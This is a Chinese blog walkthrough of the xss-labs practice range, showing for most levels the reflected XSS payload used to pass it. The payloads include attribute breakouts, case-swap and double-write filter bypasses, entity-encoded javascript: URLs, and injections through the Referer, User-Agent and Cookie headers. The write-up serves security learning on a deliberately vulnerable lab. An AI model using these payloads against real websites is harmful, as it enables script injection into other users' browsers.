xss-labs通关教程

已于 2024-06-18 20:49:13 修改
阅读量1k 收藏 25
点赞数 20
文章标签: xss 前端
于 2024-06-18 20:41:03 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_64712672/article/details/139782247
版权

xss-labs通关教程

第一关

查看网页源码

在这里插入图片描述
没有任何限制在这里插入图片描述

payload

http://xss/level1.php?name=<script>alert(111)</script>

第二关

查看源码

在这里插入图片描述

发现test被双引号和<>包围着,因此需要让它们闭合。

在这里插入图片描述

payload

http://xss/level2.php?keyword="><script>alert(111)</script><"

第三关

分析思路

输入<script>alter(111)</script>,查看网页源码

在这里插入图片描述

可以发现特殊字符被实体转义了,因此我们需要绕过实体转义。在此使用
’ οnfοcus=javascript:alert() '。
在这里插入图片描述

pyload

http://xss/level3.php?keyword=' onfocus=javascript:alert() '

http://xss/level3.php?keyword='onmouseup=alert(123)//

输入’ οnfοcus=javascript:alert() '后再次点击输入框即可。

第四关

分析思路

输入<script>alter(111)</script>,查看网页源码

在这里插入图片描述

发现跟第三关一样进行了实体转义,唯一不同的就是第三关需要对单引号进行闭合,而第四关需要对双引号进行闭合。

在这里插入图片描述

payload

http://xss/level4.php?keyword=" onfocus=javascript:alert() "

http://xss/level5.php?keyword="onmouseup=alert(123)//

第五关

分析思路

输入<script>alter(111)</script>,查看网页源码

在这里插入图片描述

发现第一个script被替换成了scr_ipt,所以换没有script的方式写入。

在这里插入图片描述

payload

"> <a href=javascript:alert()>123</a> <"

第六关

分析思路

输入<script>alter(111)</script>,查看网页源码

在这里插入图片描述

发现网页对输入做了实体转义,并且闭合符号为双引号。

在这里插入图片描述

尝试用第四关pyload,发现输入的语句on被替换成o_n,于是尝试大小写绕过。

在这里插入图片描述

发现输入的语句区分大小写,因此将第五关payload关键字href转换成大写进行尝试。

在这里插入图片描述

payload

"> <a HREF=javascript:alert()>123</a> <"

第七关

分析思路

输入第六关payload查看网页源码

在这里插入图片描述

发现网页对特殊字符进行了实体转义,过滤了href、script等关键字,闭合符号为双引号,并且不区分大小写。
对此尝试进行双写绕过。

在这里插入图片描述

payload

"> <a HRhrefEF=javascscriptript:alert()>123</a> <"

第八关

输入第七关payload

在这里插入图片描述

发现对输入的herf、script等关键字中间添加了下划线,并且对双引号进行了实体转义,说明网页可以对实体转义内容自动解析。

于是尝试将payload也实体转义。

在这里插入图片描述

payload

&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#41;

第九关

分析思路

输入第八关paylaod查看网页源码

在这里插入图片描述

发现网页内容跟第八关类似,区别就是在herf里的内容,这里给了提示(链接不合法),于是尝试输入一个合法的链接观察变化。输入http://www.baidu.com发现点击后可以正常跳转,于是推测区别就在于http://,于是更改payload进行尝试。
在这里插入图片描述

payload

&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;//http://www.baidu.com

第十关

分析思路

输入第九关paylaod查看网页源码

在这里插入图片描述

在url上输入的数据没有了,并且源码里没有keyword这个参数,说明我们需要换成别的参数t_link、t_history、t_sort三个参数任选一个,由于被隐藏了所以需要添加type=“text”,用利用双引号闭合实现payload。

在这里插入图片描述

payload

?t_sort=" onfocus=javascript:alert() type="text

第十一关

分析思路

输入第十关payload查看源码

在这里插入图片描述

发现输入的参数被实体转义了,并且相对于第十关多了个t_ref参数,对此尝试在url对t_ref进行传参,发现t_ref的内容没有变化,有可能传参的地方并不在url。于是用burp抓取请求包进行转发,添加Referer字段,并将其参数设置为第十关payload。

在这里插入图片描述

在这里插入图片描述

payload

Referer: " onfocus=javascript:alert() type="text

第十二关

分析思路

查看网页源码

在这里插入图片描述

观察网页源码,发现多出了个t_ua字段,推测可能在user-agent上进行写入。于是用burp修改请求内容,在User-Agent上修改内容将浏览器信息替换成第十关payload。

在这里插入图片描述

在这里插入图片描述

payload

User-Agent: " onfocus=javascript:alert() type="text

第十三关

分析思路

查看网页源码

在这里插入图片描述

观察网页源码,发现多出了个t_cook字段,推测可能在cookie上进行写入。于是用burp修改请求内容,在cookie修改内容将浏览器信息替换成第十关payload。

在这里插入图片描述

在这里插入图片描述

payload

Cookie: user=" onfocus=javascript:alert() type="text

第十四关

由于链接中的网页失效了,这里就跳过

第十五关

分析思路

查看网页源代码

在这里插入图片描述

发现有个ng-include指令,具体指令内容请参考https://blog.youkuaiyun.com/u011127019/article/details/53666528

在这里插入图片描述

payload

?src=%27level1.php?name=test<img%20src=1%20onerror=alert(1)>%27

第十六关

分析思路

输入<script>alert()</script>查看网页源码

在这里插入图片描述

发现script,/,空格都被替换成了&nbsp,因此用不带script和/的payload,并且使用%0d %0a做分割符

在这里插入图片描述

payload

?keyword=<img%0asrc=1%0aonerror=alert(1)>

十七关

分析思路

在url后输入 aaaaaaaaaa观察网页源码

在这里插入图片描述

通关分析源码发现传递的参数值是写在<embed>标签中的,考虑使用<embed>标签支持的事件属性进行注入,用on事件触发。

在这里插入图片描述

payload

?arg01=a&arg02=b%20onmouseout=alert(1)

十八关

跟第十七关一样

一沐大泽
关注
xss-labs-master通关教程
qq_73792226的博客
09-07 1120
abc
XSS-labs靶场通关
weixin_70292186的博客
05-08 1321
首先说一下embed标签,可以理解为定义了一个区域,可以把html文档、图片、视频、音频等内容内嵌到当前页面,这关浏览器不支持flash插件,所以图片显示不出来,如果感觉别扭,就在后端把。里面的链接失效了,这关跳过,不过提一句,这关涉及到了exif漏洞,原理是有些网站有读取图片exif信息的功能,当网站读取到的恶意的exif信息就会触发属性中的。发现有的转义,还在script中间加了下划线_,接着尝试闭合,同样存在闭合和转义,所以利用a标签的href来闭合。的,所以加个type="text"
xss-labs 通关教程
SkyWT 的博客
07-05 2268
XSS 攻击历久弥新,目前 XSS 漏洞依然广泛存在。其核心在于找到注入点并通过 payload 让浏览器执行 js 代码。注入点不仅可以来源于用户提供的文本(请求参数或后端存储的字段),也可以是 Referer、UA、Cookie 等。通过<script>标签。通过元素的 onmouseover 属性。通过<img>的 onerror 属性,如。通过 URI,如。一般来说,使用 PHP 的函数能够防御很大一部分 XSS(注意过滤单引号)。许多字符过滤上的漏洞都是没有使用。
XSS-labs通关
em.....
10-24 4532
XSS-labs通关 1.第一关 payload: http://xss/level1.php?name=<Script>alert(1)</Script> 2.第二关 这里变量出现在两处,我们直接利用第二处,做构造以及闭合 payload: 1"><ScRipt>alert(1)</ScRipt> 3.第三关 ​ ​ 用第二关的payload去试一下,发现内容没变化,但是就是没当成js代码 ​ 查一下网页源代码和php代码 ​ 看
2025年最新xss-labs靶场搭建以及完美通关教程(包教包会)
最新发布
2303_78851087的博客
04-08 1721
2025年最新xss-labs靶场搭建以及完美通关教程(包教包会)
XSS-labs 通关
qq_74806534的博客
04-01 357
发现get传参啥,就显示啥,应该对name没啥过滤。那我们直接传payload。
xsslabs通关
j2941174356的博客
09-11 233
xsslabs通关 第二关 闭合绕过 对传入的 值 进行了 HTML的实体转换 但是 没有 对 第二传入的值进行实体化 所以 将第二个标签 闭合后 写入弹窗代码 (文本框些如就可以) htmlspecialchars函数只针对大于小于号进行html实体化 第三关 HTML实体化 通过不使用 号 绕过HTMl实体化 使用不需要
xss-labs通关.pdf
04-20
xss-labs靶场20关全通关攻略
XSS-labs通关教程-完结
刘箫-技术库
10-22 1036
这时候我们的思路就尽量要绕开使用新标签,那么浏览器还有一些事件可以执行js代码,如onfocus,onblur,但是这两个是属于输入框在光标进入/离开时调用后面的js代码(可以用函数形式或者javascript:~~)还是’’ ’ >< script onclick测试一遍,发现只过滤了" 和<>,但是发现了三个隐藏的input,那么根据他们的name构造传值,让它们的type改变,不再隐藏,谁出来了谁就能利用,查看源码。用第二关的payload去试一下,发现内容没变化,但是就是没当成js代码。
WEB渗透学习-XSS-labs靶场
04-20
**XSS(跨站脚本攻击)学习指南:XSS-labs靶场详解** XSS,全称为Cross-Site Scripting,是网络安全领域常见的漏洞类型之一。它允许攻击者通过注入恶意脚本到Web页面中,进而对用户浏览器进行操控。XSS-labs是一个...
xss-labs-master.zip(xss注入通关游戏/靶场)
03-21
`xss-labs-master.zip`包含了一个专门用于学习和实践XSS注入的通关游戏或靶场,对于网络安全测试人员来说,这是一个极好的学习资源。 **XSS分类** 1. **存储型XSS**:也称为持久型XSS,攻击者将恶意脚本存入服务器...
XSS-Labs通关(1-18)
weixin_46099095的博客
03-21 4858
Level1: 通过修改name=xx,我们发现,欢迎用户test的test随着xx的值改变 输入: name=<script>alert(1)</script> Level2: 直接输入上一关payload,<script>alert(1)</script> 查看源代码 我们需要将value=""闭合,所以我们输入"><script>alert(1)</script> Level3..
xss_labs通关教程
qq_48904485的博客
03-23 742
level1 1、url输入特殊字符判断位置 2、构造Payload /level1.php?name=</h2><script>alert("xss")</script> level2 1、url输入特殊字符判断位置 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-BKe2fY6Q-1647921941027)(C:\Users\23850\AppData\Roaming\Typora\typora-user-images\image-
XSS-labs 通关实录
yingu9267的博客
05-02 945
XSS攻击与sql注入逻辑相似,找到注入点,插入恶意代码,过滤绕过……1。
xss-labs通关(未完成)
omh164052427的博客
02-24 369
本篇为本人xsslabs通关,未完成之前会一直编辑 level1 上来一头雾水,不知道该怎么办,之后我们可以赋值test试一试,查看源代码 从这里我们可以看到它将name的参数值,插入到了<h2> </h2>标签之间 那么 就很明显,这一关主要就是考察反射型xss 但是由于不知道服务器端对于提交的敏感字符有没有过滤,所以这里直接在name参数 中赋值一个简单的弹窗来进行测试。 操作如下: 将name参数重新赋值:<script>alert('
xss-labs 通关合集
nareku的博客
07-22 444
看看源码看三个箭头指向,可以发现它是通过GET传参name参数,值为“test”,并且在页面回显回来,还显示了name参数值的字符长度。那么就很明显是反射型XSS了,那就先从简单的开始,直接在name参数中赋值一个简单的弹窗来测试可以看到服务端对输入的参数没有任何过滤,服务器直接将我们的恶意代码原封不动的返回并且解析了,浏览器才能成功弹窗。......
xss-labs靶场通关
m0_70349048的博客
02-27 1464
我们发现,当我们更改name等于不同的值时,有不同的返回结果,因此在这里可能有xss漏洞然后直接进行测试,在name后面加入xss攻击语句。
XSS-labs通关教程(1-5):
snowlyzz的博客
03-12 5640
比较新手向的XSS反射型靶场,比较基础。
XSS漏洞---XSS-labs通关教程
zhoutong2323的博客
05-07 340
过滤源码:无pyload: 过滤源码:利用转译函数将特殊字符转译为实体字符 pyload:利用转义函数仅对get参数生效的特点,利用引号闭合value同时注入点击事件 Level-3 过滤源码:利用转译函数将特殊字符转译为实体字符 pyload:利用htmlspecialchars()函数未设置ENT_QUOTES不会对单引号过滤的特性 过滤源码:利用替换函数将get参数替换 pyload:利用href属性中可以执行JS代码的特性绕过防御
xss-labs通关
09-11
您好!对于 xss-labs通关,我可以提供一些基本的指导。首先,XSS(跨站脚本攻击)是一种常见的网络安全漏洞,攻击者通过插入恶意脚本来利用网站上的用户。要通关 xss-labs,您需要了解并掌握以下内容: 1. XSS 攻击原理和类型:了解什么是 XSS 攻击以及其不同的类型,包括反射型、存储型和 DOM 型 XSS。 2. 漏洞挖掘和利用:学习如何发现和识别 XSS 漏洞,了解攻击者可能会利用这些漏洞进行的各种攻击。 3. 防御措施:了解如何预防 XSS 攻击,包括输入验证、输出编码、内容安全策略(CSP)等。 4. 工具使用:熟悉一些常用的漏洞扫描工具和渗透测试工具,例如 Burp Suite、OWASP Zap 等。 5. 实践演练:在合法授权的情况下,通过实例进行实践演练,即在模拟的环境中尝试利用 XSS 漏洞进行攻击或防御。 请注意,在进行任何渗透测试或漏洞利用活动时,务必遵守法律和道德规范,仅在合法授权下进行。希望这些信息对您有所帮助,祝您顺利通关 xss-labs!如有其他问题,请随时提问。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值